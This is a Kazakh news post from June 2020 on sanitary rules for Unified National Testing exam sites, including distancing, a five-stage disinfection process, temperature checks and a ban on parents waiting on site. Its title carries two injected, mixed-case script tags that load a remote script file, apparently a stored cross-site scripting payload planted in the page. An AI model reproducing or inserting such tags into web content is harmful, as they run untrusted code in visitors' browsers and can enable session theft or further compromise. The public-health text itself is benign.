ҰБТ тапсырушылар назарына!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

19.06.2020

     📣 ҰБТ тапсырудың барлық пунктерінде санитарлық шаралар күшейтіледі

 

🔹Тестілеу пунктеріне кіру маска режимін сақтай отырып, кемінде 2 метр қашықтықты қатаң сақтай отырып жүзеге асырылатын болады;

 

🔹Әрбір тестіленуші дезинфекцияның 5 кезеңінен өтеді:

- сыртқы киімді дезинфекциялау ерітіндісімен зарарсыздандыратын арнайы тоннель арқылы өту;

- санитарлық қызметкерлердің аяқ киім мен қолды дезинфекциялау процедурасы;

- термобақылау процедурасы. Жоғары температура анықталған жағдайда тестіленушіге кезекші бригада мен медицина қызметкерлеріне жедел кеңес беріледі;

- тексерушілер мен тестіленушілер арасындағы қашықтықты сақтай отырып сәйкестендіру рәсімі;

- респираторлық немесе әдеттегі медициналық маскаларды беру.

 

🔹Тестілеу пунктерінің әрбір қабатының дәліздерінде санитайзерлер орнатылады, ал жанасуды болдырмау үшін дәліздегі және аудиториялардағы барлық есіктер алдын ала ашық жағдайда болады.

 

🔹Тест тапсырушылардың орнына отырғызу алдында аудиторияларды міндетті түрде желдетіп, кемінде 2 метр қашықтықты сақтай отырып жүзеге асырылатын болады.

 

🔹Адамдардың жаппай жиналуын болдырмау үшін, сондай-ақ карантиндік шараларды сақтау мақсатында ата-аналарға ҰБТ-ға түлектермен келуіне және оларды тестілеу өтетін аумақта күтуге тыйым салынады. Ол үшін жергілікті атқарушы органдардың күшімен балаларды ҰБТ-ға тасымалдауды ұйымдастыру қамтамасыз етіледі, ал тестілеу пункттерінің аумақтарын құқық қорғау органдарының қызметкерлері қоршайтын болады.

 

©️  Дидар Смағұлов, Ұлттық тестілеу орталығының директоры

 

Просмотров: 355


Пікір қосу



Деректерді қолтаңбаға қосу